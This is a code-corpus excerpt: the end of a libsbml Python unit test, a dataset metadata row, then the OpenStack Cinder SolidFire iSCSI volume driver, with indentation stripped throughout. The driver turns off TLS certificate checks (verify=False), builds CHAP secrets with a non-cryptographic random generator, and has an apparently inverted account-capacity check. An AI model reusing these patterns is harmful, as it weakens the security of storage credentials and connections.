xmlns.add( "http://www.sbml.org", "testsbml")
sbmlns = libsbml.SBMLNamespaces(2,1)
sbmlns.addNamespaces(xmlns)
object = libsbml.RateRule(sbmlns)
self.assert_( object.getTypeCode() == libsbml.SBML_RATE_RULE )
self.assert_( object.getMetaId() == "" )
self.assert_( object.getNotes() == None )
self.assert_( object.getAnnotation() == None )
self.assert_( object.getLevel() == 2 )
self.assert_( object.getVersion() == 1 )
self.assert_( object.getNamespaces() != None )
self.assert_( object.getNamespaces().getLength() == 2 )
_dummyList = [ object ]; _dummyList[:] = []; del _dummyList
pass
def test_RateRule_free_NULL(self):
_dummyList = [ None ]; _dummyList[:] = []; del _dummyList
pass
def test_RateRule_setVariable(self):
variable = "x";
self.RR.setVariable(variable)
self.assert_(( variable == self.RR.getVariable() ))
self.assertEqual( True, self.RR.isSetVariable() )
if (self.RR.getVariable() == variable):
pass
self.RR.setVariable(self.RR.getVariable())
self.assert_(( variable == self.RR.getVariable() ))
self.RR.setVariable("")
self.assertEqual( False, self.RR.isSetVariable() )
if (self.RR.getVariable() != None):
pass
pass
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestRateRule))
return suite
if __name__ == "__main__":
if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :
sys.exit(0)
else:
sys.exit(1)
|
gpl-3.0
| 2,724,558,399,042,802,700 | 32.616071 | 79 | 0.635591 | false |
petrutlucian94/cinder
|
cinder/volume/drivers/solidfire.py
|
1
|
52455
|
# All Rights Reserved.
# Copyright 2013 SolidFire Inc
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import math
import random
import socket
import string
import time
import warnings
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import importutils
from oslo_utils import timeutils
from oslo_utils import units
import requests
from requests.packages.urllib3 import exceptions
import six
from cinder import context
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.image import image_utils
from cinder.volume.drivers.san import san
from cinder.volume import qos_specs
from cinder.volume.targets import iscsi as iscsi_driver
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)
sf_opts = [
cfg.BoolOpt('sf_emulate_512',
default=True,
help='Set 512 byte emulation on volume creation; '),
cfg.BoolOpt('sf_allow_tenant_qos',
default=False,
help='Allow tenants to specify QOS on create'),
cfg.StrOpt('sf_account_prefix',
default=None,
help='Create SolidFire accounts with this prefix. Any string '
'can be used here, but the string \"hostname\" is special '
'and will create a prefix using the cinder node hostname '
'(previous default behavior). The default is NO prefix.'),
cfg.StrOpt('sf_template_account_name',
default='openstack-vtemplate',
help='Account name on the SolidFire Cluster to use as owner of '
'template/cache volumes (created if does not exist).'),
cfg.BoolOpt('sf_allow_template_caching',
default=True,
help='Create an internal cache of copy of images when '
'a bootable volume is created to eliminate fetch from '
'glance and qemu-conversion on subsequent calls.'),
cfg.IntOpt('sf_api_port',
default=443,
help='SolidFire API port. Useful if the device api is behind '
'a proxy on a different port.')]
CONF = cfg.CONF
CONF.register_opts(sf_opts)
def retry(exc_tuple, tries=5, delay=1, backoff=2):
def retry_dec(f):
@six.wraps(f)
def func_retry(*args, **kwargs):
_tries, _delay = tries, delay
while _tries > 1:
try:
return f(*args, **kwargs)
except exc_tuple:
time.sleep(_delay)
_tries -= 1
_delay *= backoff
LOG.debug('Retrying %(args)s, %(tries)s attempts '
'remaining...',
{'args': args, 'tries': _tries})
# NOTE(jdg): Don't log the params passed here
# some cmds like createAccount will have sensitive
# info in the params, grab only the second tuple
# which should be the Method
msg = (_('Retry count exceeded for command: %s') %
(args[1],))
LOG.error(msg)
raise exception.SolidFireAPIException(message=msg)
return func_retry
return retry_dec
class SolidFireDriver(san.SanISCSIDriver):
"""OpenStack driver to enable SolidFire cluster.
Version history:
1.0 - Initial driver
1.1 - Refactor, clone support, qos by type and minor bug fixes
1.2 - Add xfr and retype support
1.2.1 - Add export/import support
1.2.2 - Catch VolumeNotFound on accept xfr
2.0.0 - Move from httplib to requests
2.0.1 - Implement SolidFire Snapshots
2.0.2 - Implement secondary account
"""
VERSION = '2.0.2'
sf_qos_dict = {'slow': {'minIOPS': 100,
'maxIOPS': 200,
'burstIOPS': 200},
'medium': {'minIOPS': 200,
'maxIOPS': 400,
'burstIOPS': 400},
'fast': {'minIOPS': 500,
'maxIOPS': 1000,
'burstIOPS': 1000},
'performant': {'minIOPS': 2000,
'maxIOPS': 4000,
'burstIOPS': 4000},
'off': None}
sf_qos_keys = ['minIOPS', 'maxIOPS', 'burstIOPS']
cluster_stats = {}
retry_exc_tuple = (exception.SolidFireRetryableException,
requests.exceptions.ConnectionError)
retryable_errors = ['xDBVersionMismatch',
'xMaxSnapshotsPerVolumeExceeded',
'xMaxClonesPerVolumeExceeded',
'xMaxSnapshotsPerNodeExceeded',
'xMaxClonesPerNodeExceeded',
'xNotReadyForIO']
def __init__(self, *args, **kwargs):
super(SolidFireDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(sf_opts)
self._endpoint = self._build_endpoint_info()
self.template_account_id = None
self.max_volumes_per_account = 1990
try:
self._update_cluster_status()
except exception.SolidFireAPIException:
pass
if self.configuration.sf_allow_template_caching:
account = self.configuration.sf_template_account_name
self.template_account_id = self._create_template_account(account)
self.target_driver = (
importutils.import_object(
'cinder.volume.drivers.solidfire.SolidFireISCSI',
solidfire_driver=self,
configuration=self.configuration))
def _create_template_account(self, account_name):
# We raise an API exception if the account doesn't exist
# We need to take account_prefix settings into consideration
# This just uses the same method to do template account create
# as we use for any other OpenStack account
account_name = self._get_sf_account_name(account_name)
try:
id = self._issue_api_request(
'GetAccountByName',
{'username': account_name})['result']['account']['accountID']
except exception.SolidFireAPIException:
chap_secret = self._generate_random_string(12)
params = {'username': account_name,
'initiatorSecret': chap_secret,
'targetSecret': chap_secret,
'attributes': {}}
id = self._issue_api_request('AddAccount',
params)['result']['accountID']
return id
def _build_endpoint_info(self, **kwargs):
endpoint = {}
endpoint['mvip'] = (
kwargs.get('mvip', self.configuration.san_ip))
endpoint['login'] = (
kwargs.get('login', self.configuration.san_login))
endpoint['passwd'] = (
kwargs.get('passwd', self.configuration.san_password))
endpoint['port'] = (
kwargs.get('port', self.configuration.sf_api_port))
endpoint['url'] = 'https://%s:%s' % (endpoint['mvip'],
endpoint['port'])
# TODO(jdg): consider a call to GetAPI and setting version
return endpoint
@retry(retry_exc_tuple, tries=6)
def _issue_api_request(self, method, params, version='1.0', endpoint=None):
if params is None:
params = {}
if endpoint is None:
endpoint = self._endpoint
payload = {'method': method, 'params': params}
url = '%s/json-rpc/%s/' % (endpoint['url'], version)
with warnings.catch_warnings():
warnings.simplefilter("ignore", exceptions.InsecureRequestWarning)
req = requests.post(url,
data=json.dumps(payload),
auth=(endpoint['login'], endpoint['passwd']),
verify=False,
timeout=30)
response = req.json()
req.close()
if (('error' in response) and
(response['error']['name'] in self.retryable_errors)):
msg = ('Retryable error (%s) encountered during '
'SolidFire API call.' % response['error']['name'])
LOG.debug(msg)
raise exception.SolidFireRetryableException(message=msg)
if 'error' in response:
msg = _('API response: %s') % response
raise exception.SolidFireAPIException(msg)
return response
def _get_volumes_by_sfaccount(self, account_id):
"""Get all volumes on cluster for specified account."""
params = {'accountID': account_id}
data = self._issue_api_request('ListVolumesForAccount', params)
if 'result' in data:
return data['result']['volumes']
def _get_sfaccount_by_name(self, sf_account_name):
"""Get SolidFire account object by name."""
sfaccount = None
params = {'username': sf_account_name}
try:
data = self._issue_api_request('GetAccountByName', params)
if 'result' in data and 'account' in data['result']:
LOG.debug('Found solidfire account: %s', sf_account_name)
sfaccount = data['result']['account']
except exception.SolidFireAPIException as ex:
if 'xUnknownAccount' in ex.msg:
return sfaccount
else:
raise
return sfaccount
def _get_sf_account_name(self, project_id):
"""Build the SolidFire account name to use."""
prefix = self.configuration.sf_account_prefix or ''
if prefix == 'hostname':
prefix = socket.gethostname()
return '%s%s%s' % (prefix, '-' if prefix else '', project_id)
def _get_sfaccount(self, project_id):
sf_account_name = self._get_sf_account_name(project_id)
sfaccount = self._get_sfaccount_by_name(sf_account_name)
if sfaccount is None:
raise exception.SolidFireAccountNotFound(
account_name=sf_account_name)
return sfaccount
def _create_sfaccount(self, project_id):
"""Create account on SolidFire device if it doesn't already exist.
We're first going to check if the account already exists, if it does
just return it. If not, then create it.
"""
sf_account_name = self._get_sf_account_name(project_id)
sfaccount = self._get_sfaccount_by_name(sf_account_name)
if sfaccount is None:
LOG.debug('solidfire account: %s does not exist, create it...',
sf_account_name)
chap_secret = self._generate_random_string(12)
params = {'username': sf_account_name,
'initiatorSecret': chap_secret,
'targetSecret': chap_secret,
'attributes': {}}
data = self._issue_api_request('AddAccount', params)
if 'result' in data:
sfaccount = self._get_sfaccount_by_name(sf_account_name)
return sfaccount
def _get_cluster_info(self):
"""Query the SolidFire cluster for some property info."""
params = {}
data = self._issue_api_request('GetClusterInfo', params)
if 'result' not in data:
msg = _("API response: %s") % data
raise exception.SolidFireAPIException(msg)
return data['result']
def _generate_random_string(self, length):
"""Generates random_string to use for CHAP password."""
char_set = string.ascii_uppercase + string.digits
return ''.join(random.sample(char_set, length))
def _get_model_info(self, sfaccount, sf_volume_id):
"""Gets the connection info for specified account and volume."""
cluster_info = self._get_cluster_info()
iscsi_portal = cluster_info['clusterInfo']['svip'] + ':3260'
chap_secret = sfaccount['targetSecret']
found_volume = False
iteration_count = 0
while not found_volume and iteration_count < 600:
volume_list = self._get_volumes_by_sfaccount(
sfaccount['accountID'])
iqn = None
for v in volume_list:
if v['volumeID'] == sf_volume_id:
iqn = v['iqn']
found_volume = True
break
if not found_volume:
time.sleep(2)
iteration_count += 1
if not found_volume:
LOG.error(_LE('Failed to retrieve volume SolidFire-'
'ID: %s in get_by_account!'), sf_volume_id)
raise exception.VolumeNotFound(volume_id=sf_volume_id)
model_update = {}
# NOTE(john-griffith): SF volumes are always at lun 0
model_update['provider_location'] = ('%s %s %s'
% (iscsi_portal, iqn, 0))
model_update['provider_auth'] = ('CHAP %s %s'
% (sfaccount['username'],
chap_secret))
if not self.configuration.sf_emulate_512:
model_update['provider_geometry'] = ('%s %s' % (4096, 4096))
model_update['provider_id'] = ('%s' % sf_volume_id)
return model_update
def _do_clone_volume(self, src_uuid,
src_project_id,
vref):
"""Create a clone of an existing volume or snapshot."""
attributes = {}
qos = {}
sf_accounts = self._get_sfaccounts_for_tenant(vref['project_id'])
if not sf_accounts:
sf_account = self._create_sfaccount(vref['project_id'])
else:
# Check availability for creates
sf_account = self._get_account_create_availability(sf_accounts)
if not sf_account:
# TODO(jdg): We're not doing tertiaries, so fail
msg = _('volumes/account exceeded on both primary '
'and secondary SolidFire accounts')
raise exception.SolidFireDriverException(msg)
params = {'name': 'UUID-%s' % vref['id'],
'newAccountID': sf_account['accountID']}
# NOTE(jdg): First check the SF snapshots
# if we don't find a snap by the given name, just move on to check
# volumes. This may be a running system that was updated from
# before we did snapshots, so need to check both
is_clone = False
snap_name = 'UUID-%s' % src_uuid
snaps = self._get_sf_snapshots()
snap = next((s for s in snaps if s["name"] == snap_name), None)
if snap:
params['snapshotID'] = int(snap['snapshotID'])
params['volumeID'] = int(snap['volumeID'])
params['newSize'] = int(vref['size'] * units.Gi)
else:
sf_vol = self._get_sf_volume(
src_uuid, {'accountID': sf_account['accountID']})
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=src_uuid)
params['volumeID'] = int(sf_vol['volumeID'])
params['newSize'] = int(vref['size'] * units.Gi)
is_clone = True
data = self._issue_api_request('CloneVolume', params, version='6.0')
if (('result' not in data) or ('volumeID' not in data['result'])):
msg = _("API response: %s") % data
raise exception.SolidFireAPIException(msg)
sf_volume_id = data['result']['volumeID']
if (self.configuration.sf_allow_tenant_qos and
vref.get('volume_metadata')is not None):
qos = self._set_qos_presets(vref)
ctxt = context.get_admin_context()
type_id = vref.get('volume_type_id', None)
if type_id is not None:
qos = self._set_qos_by_volume_type(ctxt, type_id)
# NOTE(jdg): all attributes are copied via clone, need to do an update
# to set any that were provided
params = {'volumeID': sf_volume_id}
create_time = vref['created_at'].isoformat()
attributes = {'uuid': vref['id'],
'is_clone': 'True',
'src_uuid': src_uuid,
'created_at': create_time}
if qos:
params['qos'] = qos
for k, v in qos.items():
attributes[k] = str(v)
params['attributes'] = attributes
data = self._issue_api_request('ModifyVolume', params)
model_update = self._get_model_info(sf_account, sf_volume_id)
if model_update is None:
mesg = _('Failed to get model update from clone')
raise exception.SolidFireAPIException(mesg)
# Increment the usage count, just for data collection
# We're only doing this for clones, not create_from snaps
if is_clone:
data = self._update_attributes(sf_vol)
return (data, sf_account, model_update)
def _update_attributes(self, sf_vol):
cloned_count = sf_vol['attributes'].get('cloned_count', 0)
cloned_count += 1
attributes = sf_vol['attributes']
attributes['cloned_count'] = cloned_count
params = {'volumeID': int(sf_vol['volumeID'])}
params['attributes'] = attributes
return self._issue_api_request('ModifyVolume', params)
def _do_volume_create(self, sf_account, params):
data = self._issue_api_request('CreateVolume', params)
if (('result' not in data) or ('volumeID' not in data['result'])):
msg = _("Failed volume create: %s") % data
raise exception.SolidFireAPIException(msg)
sf_volume_id = data['result']['volumeID']
return self._get_model_info(sf_account, sf_volume_id)
def _do_snapshot_create(self, params):
data = self._issue_api_request('CreateSnapshot', params, version='6.0')
if (('result' not in data) or ('snapshotID' not in data['result'])):
msg = _("Failed snapshot create: %s") % data
raise exception.SolidFireAPIException(msg)
return data['result']['snapshotID']
def _set_qos_presets(self, volume):
qos = {}
valid_presets = self.sf_qos_dict.keys()
# First look to see if they included a preset
presets = [i.value for i in volume.get('volume_metadata')
if i.key == 'sf-qos' and i.value in valid_presets]
if len(presets) > 0:
if len(presets) > 1:
LOG.warning(_LW('More than one valid preset was '
'detected, using %s'), presets[0])
qos = self.sf_qos_dict[presets[0]]
else:
# look for explicit settings
for i in volume.get('volume_metadata'):
if i.key in self.sf_qos_keys:
qos[i.key] = int(i.value)
return qos
def _set_qos_by_volume_type(self, ctxt, type_id):
qos = {}
volume_type = volume_types.get_volume_type(ctxt, type_id)
qos_specs_id = volume_type.get('qos_specs_id')
specs = volume_type.get('extra_specs')
# NOTE(jdg): We prefer the qos_specs association
# and over-ride any existing
# extra-specs settings if present
if qos_specs_id is not None:
kvs = qos_specs.get_qos_specs(ctxt, qos_specs_id)['specs']
else:
kvs = specs
for key, value in kvs.items():
if ':' in key:
fields = key.split(':')
key = fields[1]
if key in self.sf_qos_keys:
qos[key] = int(value)
return qos
def _get_sf_volume(self, uuid, params):
data = self._issue_api_request('ListVolumesForAccount', params)
if 'result' not in data:
msg = _("Failed to get SolidFire Volume: %s") % data
raise exception.SolidFireAPIException(msg)
found_count = 0
sf_volref = None
for v in data['result']['volumes']:
# NOTE(jdg): In the case of "name" we can't
# update that on manage/import, so we use
# the uuid attribute
meta = v.get('attributes')
alt_id = meta.get('uuid', 'empty')
if uuid in v['name'] or uuid in alt_id:
found_count += 1
sf_volref = v
LOG.debug("Mapped SolidFire volumeID %(volume_id)s "
"to cinder ID %(uuid)s.",
{'volume_id': v['volumeID'], 'uuid': uuid})
if found_count == 0:
# NOTE(jdg): Previously we would raise here, but there are cases
# where this might be a cleanup for a failed delete.
# Until we get better states we'll just log an error
LOG.error(_LE("Volume %s, not found on SF Cluster."), uuid)
if found_count > 1:
LOG.error(_LE("Found %(count)s volumes mapped to id: %(uuid)s."),
{'count': found_count,
'uuid': uuid})
raise exception.DuplicateSfVolumeNames(vol_name=uuid)
return sf_volref
def _get_sf_snapshots(self, sf_volid=None):
params = {}
if sf_volid:
params = {'volumeID': sf_volid}
data = self._issue_api_request('ListSnapshots', params, version='6.0')
if 'result' not in data:
msg = _("Failed to get SolidFire Snapshot: %s") % data
raise exception.SolidFireAPIException(msg)
return data['result']['snapshots']
def _create_image_volume(self, context,
image_meta, image_service,
image_id):
# NOTE(jdg): It's callers responsibility to ensure that
# the optional properties.virtual_size is set on the image
# before we get here
virt_size = int(image_meta['properties'].get('virtual_size'))
min_sz_in_bytes = (
math.ceil(virt_size / float(units.Gi)) * float(units.Gi))
min_sz_in_gig = math.ceil(min_sz_in_bytes / float(units.Gi))
attributes = {}
attributes['image_info'] = {}
attributes['image_info']['image_updated_at'] = (
image_meta['updated_at'].isoformat())
attributes['image_info']['image_name'] = (
image_meta['name'])
attributes['image_info']['image_created_at'] = (
image_meta['created_at'].isoformat())
attributes['image_info']['image_id'] = image_meta['id']
params = {'name': 'OpenStackIMG-%s' % image_id,
'accountID': self.template_account_id,
'sliceCount': 1,
'totalSize': int(min_sz_in_bytes),
'enable512e': self.configuration.sf_emulate_512,
'attributes': attributes,
'qos': {}}
sf_account = self._issue_api_request(
'GetAccountByID',
{'accountID': self.template_account_id})
template_vol = self._do_volume_create(sf_account, params)
tvol = {}
tvol['id'] = image_id
tvol['provider_location'] = template_vol['provider_location']
tvol['provider_auth'] = template_vol['provider_auth']
connector = 'na'
conn = self.initialize_connection(tvol, connector)
attach_info = super(SolidFireDriver, self)._connect_device(conn)
properties = 'na'
try:
image_utils.fetch_to_raw(context,
image_service,
image_id,
attach_info['device']['path'],
self.configuration.volume_dd_blocksize,
size=min_sz_in_gig)
except Exception as exc:
params['volumeID'] = template_vol['volumeID']
LOG.error(_LE('Failed image conversion during cache creation: %s'),
exc)
LOG.debug('Removing SolidFire Cache Volume (SF ID): %s',
template_vol['volumeID'])
self._detach_volume(context, attach_info, tvol, properties)
self._issue_api_request('DeleteVolume', params)
return
self._detach_volume(context, attach_info, tvol, properties)
sf_vol = self._get_sf_volume(image_id, params)
LOG.debug('Successfully created SolidFire Image Template '
'for image-id: %s', image_id)
return sf_vol
def _verify_image_volume(self, context, image_meta, image_service):
# This method just verifies that IF we have a cache volume that
# it's still up to date and current WRT the image in Glance
# ie an image-update hasn't occurred since we grabbed it
# If it's out of date, just delete it and we'll create a new one
# Any other case we don't care and just return without doing anything
params = {'accountID': self.template_account_id}
sf_vol = self._get_sf_volume(image_meta['id'], params)
if sf_vol is None:
return
# Check updated_at field, delete copy and update if needed
if sf_vol['attributes']['image_info']['image_updated_at'] == (
image_meta['updated_at'].isoformat()):
return
else:
# Bummer, it's been updated, delete it
params = {'accountID': self.template_account_id}
params['volumeID'] = sf_vol['volumeID']
data = self._issue_api_request('DeleteVolume', params)
if 'result' not in data:
msg = _("Failed to delete SolidFire Image-Volume: %s") % data
raise exception.SolidFireAPIException(msg)
if not self._create_image_volume(context,
image_meta,
image_service,
image_meta['id']):
msg = _("Failed to create SolidFire Image-Volume")
raise exception.SolidFireAPIException(msg)
def _get_sfaccounts_for_tenant(self, cinder_project_id):
data = self._issue_api_request('ListAccounts', {})
if 'result' not in data:
msg = _("API response: %s") % data
raise exception.SolidFireAPIException(msg)
# Note(jdg): On SF we map account-name to OpenStack's tenant ID
# we use tenantID in here to get secondaries that might exist
# Also: we expect this to be sorted, so we get the primary first
# in the list
return sorted([acc for acc in data['result']['accounts'] if
cinder_project_id in acc['username']])
def _get_all_active_volumes(self, cinder_uuid=None):
params = {}
data = self._issue_api_request('ListActiveVolumes',
params)
if 'result' not in data:
msg = _("Failed get active SolidFire volumes: %s") % data
raise exception.SolidFireAPIException(msg)
if cinder_uuid:
deleted_vols = ([v for v in data['result']['volumes'] if
cinder_uuid in v.name])
else:
deleted_vols = [v for v in data['result']['volumes']]
return deleted_vols
def _get_all_deleted_volumes(self, cinder_uuid=None):
params = {}
data = self._issue_api_request('ListDeletedVolumes',
params)
if 'result' not in data:
msg = _("Failed get Deleted SolidFire volumes: %s") % data
raise exception.SolidFireAPIException(msg)
if cinder_uuid:
deleted_vols = ([v for v in data['result']['volumes'] if
cinder_uuid in v['name']])
else:
deleted_vols = [v for v in data['result']['volumes']]
return deleted_vols
def _get_account_create_availability(self, accounts):
# we'll check both the primary and the secondary
# if it exists and return whichever one has count
# available.
for acc in accounts:
if self._get_volumes_for_account(
acc['accountID']) > self.max_volumes_per_account:
return acc
if len(accounts) == 1:
sfaccount = self._create_sfaccount(accounts[0]['name'] + '_')
return sfaccount
return None
def _get_volumes_for_account(self, sf_account_id, cinder_uuid=None):
# ListVolumesForAccount gives both Active and Deleted
# we require the solidfire accountID, uuid of volume
# is optional
params = {'accountID': sf_account_id}
response = self._issue_api_request('ListVolumesForAccount',
params)
if cinder_uuid:
vlist = [v for v in response['result']['volumes'] if
cinder_uuid in v['name']]
else:
vlist = [v for v in response['result']['volumes']]
vlist = sorted(vlist, key=lambda k: k['volumeID'])
return vlist
def clone_image(self, context,
volume, image_location,
image_meta, image_service):
# Check out pre-requisites:
# Is template caching enabled?
if not self.configuration.sf_allow_template_caching:
return None, False
# Is the image owned by this tenant or public?
if ((not image_meta.get('is_public', False)) and
(image_meta['owner'] != volume['project_id'])):
LOG.warning(_LW("Requested image is not "
"accessible by current Tenant."))
return None, False
# Is virtual_size property set on the image?
if ((not image_meta.get('properties', None)) or
(not image_meta['properties'].get('virtual_size', None))):
LOG.info(_LI('Unable to create cache volume because image: %s '
'does not include properties.virtual_size'),
image_meta['id'])
return None, False
try:
self._verify_image_volume(context,
image_meta,
image_service)
except exception.SolidFireAPIException:
return None, False
account = self.configuration.sf_template_account_name
try:
(data, sfaccount, model) = self._do_clone_volume(image_meta['id'],
account,
volume)
except exception.VolumeNotFound:
if self._create_image_volume(context,
image_meta,
image_service,
image_meta['id']) is None:
# We failed, dump out
return None, False
# Ok, should be good to go now, try it again
(data, sfaccount, model) = self._do_clone_volume(image_meta['id'],
account,
volume)
return model, True
def create_volume(self, volume):
"""Create volume on SolidFire device.
The account is where CHAP settings are derived from, volume is
created and exported. Note that the new volume is immediately ready
for use.
One caveat here is that an existing user account must be specified
in the API call to create a new volume. We use a set algorithm to
determine account info based on passed in cinder volume object. First
we check to see if the account already exists (and use it), or if it
does not already exist, we'll go ahead and create it.
"""
slice_count = 1
attributes = {}
qos = {}
if (self.configuration.sf_allow_tenant_qos and
volume.get('volume_metadata')is not None):
qos = self._set_qos_presets(volume)
ctxt = context.get_admin_context()
type_id = volume['volume_type_id']
if type_id is not None:
qos = self._set_qos_by_volume_type(ctxt, type_id)
create_time = volume['created_at'].isoformat()
attributes = {'uuid': volume['id'],
'is_clone': 'False',
'created_at': create_time}
if qos:
for k, v in qos.items():
attributes[k] = str(v)
sf_accounts = self._get_sfaccounts_for_tenant(volume['project_id'])
if not sf_accounts:
sf_account = self._create_sfaccount(volume['project_id'])
else:
sf_account = self._get_account_create_availability(sf_accounts)
params = {'name': 'UUID-%s' % volume['id'],
'accountID': sf_account['accountID'],
'sliceCount': slice_count,
'totalSize': int(volume['size'] * units.Gi),
'enable512e': self.configuration.sf_emulate_512,
'attributes': attributes,
'qos': qos}
# NOTE(jdg): Check if we're a migration tgt, if so
# use the old volume-id here for the SF Name
migration_status = volume.get('migration_status', None)
if migration_status and 'target' in migration_status:
k, v = migration_status.split(':')
params['name'] = 'UUID-%s' % v
params['attributes']['migration_uuid'] = volume['id']
params['attributes']['uuid'] = v
return self._do_volume_create(sf_account, params)
def create_cloned_volume(self, volume, src_vref):
"""Create a clone of an existing volume."""
(_data, _sfaccount, model) = self._do_clone_volume(
src_vref['id'],
src_vref['project_id'],
volume)
return model
def delete_volume(self, volume):
"""Delete SolidFire Volume from device.
SolidFire allows multiple volumes with same name,
volumeID is what's guaranteed unique.
"""
accounts = self._get_sfaccounts_for_tenant(volume['project_id'])
if accounts is None:
LOG.error(_LE("Account for Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"delete_volume operation!"), volume['id'])
LOG.error(_LE("This usually means the volume was never "
"successfully created."))
return
for acc in accounts:
sf_vol = self._get_volumes_for_account(acc['accountID'],
volume['id'])[0]
if sf_vol:
break
if sf_vol is not None:
params = {'volumeID': sf_vol['volumeID']}
data = self._issue_api_request('DeleteVolume', params)
if 'result' not in data:
msg = _("Failed to delete SolidFire Volume: %s") % data
raise exception.SolidFireAPIException(msg)
else:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"delete_volume operation!"), volume['id'])
def delete_snapshot(self, snapshot):
"""Delete the specified snapshot from the SolidFire cluster."""
sf_snap_name = 'UUID-%s' % snapshot['id']
accounts = self._get_sfaccounts_for_tenant(snapshot['project_id'])
snap = None
for a in accounts:
params = {'accountID': a['accountID']}
sf_vol = self._get_sf_volume(snapshot['volume_id'], params)
sf_snaps = self._get_sf_snapshots(sf_vol['volumeID'])
snap = next((s for s in sf_snaps if s["name"] == sf_snap_name),
None)
if snap:
params = {'snapshotID': snap['snapshotID']}
data = self._issue_api_request('DeleteSnapshot',
params,
version='6.0')
if 'result' not in data:
msg = (_("Failed to delete SolidFire Snapshot: %s") %
data)
raise exception.SolidFireAPIException(msg)
return
# Make sure it's not "old style" using clones as snaps
LOG.debug("Snapshot not found, checking old style clones.")
self.delete_volume(snapshot)
def create_snapshot(self, snapshot):
sfaccount = self._get_sfaccount(snapshot['project_id'])
if sfaccount is None:
LOG.error(_LE("Account for Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"create_snapshot operation!"), snapshot['volume_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(snapshot['volume_id'], params)
if sf_vol is None:
raise exception.VolumeNotFound(volume_id=snapshot['volume_id'])
params = {'volumeID': sf_vol['volumeID'],
'name': 'UUID-%s' % snapshot['id']}
self._do_snapshot_create(params)
def create_volume_from_snapshot(self, volume, snapshot):
"""Create a volume from the specified snapshot."""
(_data, _sfaccount, model) = self._do_clone_volume(
snapshot['id'],
snapshot['project_id'],
volume)
return model
def get_volume_stats(self, refresh=False):
"""Get volume status.
If 'refresh' is True, run update first.
The name is a bit misleading as
the majority of the data here is cluster
data
"""
if refresh:
try:
self._update_cluster_status()
except exception.SolidFireAPIException:
pass
return self.cluster_stats
def extend_volume(self, volume, new_size):
"""Extend an existing volume."""
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"extend_volume operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
params = {
'volumeID': sf_vol['volumeID'],
'totalSize': int(new_size * units.Gi)
}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
def _update_cluster_status(self):
"""Retrieve status info for the Cluster."""
params = {}
# NOTE(jdg): The SF api provides an UNBELIEVABLE amount
# of stats data, this is just one of the calls
results = self._issue_api_request('GetClusterCapacity', params)
if 'result' not in results:
LOG.error(_LE('Failed to get updated stats'))
results = results['result']['clusterCapacity']
free_capacity = (
results['maxProvisionedSpace'] - results['usedSpace'])
data = {}
backend_name = self.configuration.safe_get('volume_backend_name')
data["volume_backend_name"] = backend_name or self.__class__.__name__
data["vendor_name"] = 'SolidFire Inc'
data["driver_version"] = self.VERSION
data["storage_protocol"] = 'iSCSI'
data['total_capacity_gb'] = (
float(results['maxProvisionedSpace'] / units.Gi))
data['free_capacity_gb'] = float(free_capacity / units.Gi)
data['reserved_percentage'] = self.configuration.reserved_percentage
data['QoS_support'] = True
data['compression_percent'] = (
results['compressionPercent'])
data['deduplicaton_percent'] = (
results['deDuplicationPercent'])
data['thin_provision_percent'] = (
results['thinProvisioningPercent'])
self.cluster_stats = data
def attach_volume(self, context, volume,
instance_uuid, host_name,
mountpoint):
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"attach_volume operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
attributes = sf_vol['attributes']
attributes['attach_time'] = volume.get('attach_time', None)
attributes['attached_to'] = instance_uuid
params = {
'volumeID': sf_vol['volumeID'],
'attributes': attributes
}
data = self._issue_api_request('ModifyVolume', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
def detach_volume(self, context, volume, attachment=None):
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"detach_volume operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
attributes = sf_vol['attributes']
attributes['attach_time'] = None
attributes['attached_to'] = None
params = {
'volumeID': sf_vol['volumeID'],
'attributes': attributes
}
data = self._issue_api_request('ModifyVolume', params)
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
def accept_transfer(self, context, volume,
new_user, new_project):
sfaccount = self._get_sfaccount(volume['project_id'])
params = {'accountID': sfaccount['accountID']}
sf_vol = self._get_sf_volume(volume['id'], params)
if sf_vol is None:
LOG.error(_LE("Volume ID %s was not found on "
"the SolidFire Cluster while attempting "
"accept_transfer operation!"), volume['id'])
raise exception.VolumeNotFound(volume_id=volume['id'])
if new_project != volume['project_id']:
# do a create_sfaccount here as this tenant
# may not exist on the cluster yet
sfaccount = self._create_sfaccount(new_project)
params = {
'volumeID': sf_vol['volumeID'],
'accountID': sfaccount['accountID']
}
data = self._issue_api_request('ModifyVolume',
params, version='5.0')
if 'result' not in data:
raise exception.SolidFireAPIDataException(data=data)
volume['project_id'] = new_project
volume['user_id'] = new_user
